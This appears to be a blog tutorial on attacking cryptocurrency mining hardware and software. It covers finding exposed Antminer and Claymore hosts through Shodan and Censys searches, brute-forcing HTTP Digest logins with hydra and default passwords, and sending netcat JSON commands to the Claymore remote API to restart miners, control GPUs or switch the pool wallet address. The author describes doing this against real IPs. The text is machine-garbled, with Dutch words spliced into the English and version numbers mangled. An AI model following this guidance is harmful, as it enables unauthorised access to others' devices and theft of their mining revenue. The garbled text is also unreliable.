Hacking Cryptocurrency Miners with OSINT Technologies
NOTE: All the methods I have explained are at your own risk
Open Source Intelligence(OSINT) is one of the very first technics to gather information before the attack. There have bot many hacking cases using OSINT ter the past. Along with the developing IoT devices, wij can collect lots of critical gegevens on the public web. Wij will be gathering critical gegevens for Cryptocurrency Miners (Bitcoin[Antminer] and Ethereum[Claymore]) ter this article.
Many Cryptocurrency miners devices and software need the internet connection to send/receive gegevens. So that, they have some vulnerability for attackers.
Reconnaissance the Antminer!
The best bitcoin ASIC miner is Antminer S9/S7. The miner’s hardware use “lighttpd/1.Four.32” web server and some of thesis have open SSH Port. There is an exploit for “Lighttpd 1.Four.31” version. However, you can not access the server with this exploit.
The webpagina on the web server is protected by “Digest HTTP Authentication”. The critical point is that miners need username and password to loom ter.
It’s known that wij need some information or keywords to collect gegevens with OSINT technologies. That information is the keyword including “antMiner Configuration” te HTTP headers which emerges each time I send a request to the server
I have searched on censys.io and shodan.io with some specific dorks and collected the IP addresses.
The system can be accessed by a brute-force attack on the HTTP port or SSH port.
Firstly, I needed a user guide to learn default HTTP username and password. After, I have searched on Google with “antminer default password” and found a webstek that includes User Guide.
For this tutorial, I preferred to use hydra for brute-force attack (Bruteforcing HTTP Digest Authentication) with exposed most common Ten.000 passwords. You can also use Burp Suite Intruder too.
If you are fortunate, you can access the configuration pagina.
Attackers can edit the pagina spil desired.
Claymore Miner Software
Another type of attack is also targeting the Claymore Miner Software (such spil Altcoins, ethereum, zcash miner)
I’ve made another search on shodan.io with some specific dorks.
You can send some JSON packets with Claymore Remote Manager API to manage the miner server remotely.
Ter here, wij control GPUs (disable, dual mode etc.) or edit the config.txt to switch the pool wallet address with sending some instructions.
Wij will send “miner_restart” or “control_gpu” directive to detect whether it is read-only or write/read. I used NC to send JSON instruction on MacOS.
Firstly, wij attempt directive with “miner_getstat1”
After that, wij attempt to send guideline with “control_gpu” to detect whether it is read-only or write/read.
Wij received an error with the code sent below.
I succeeded restarting the system when I attempted on a different IP. It shows that Claymore Remote Manager API permits you read/write auth.
Claymore Remote Manager also permits you edit the config verkeersopstopping with using JSON format (sending json verkeersopstopping). However, you can edit lightly with using the Claymore’s Ethereum Dual Miner Manager on Windows also can switch pool wallet address too.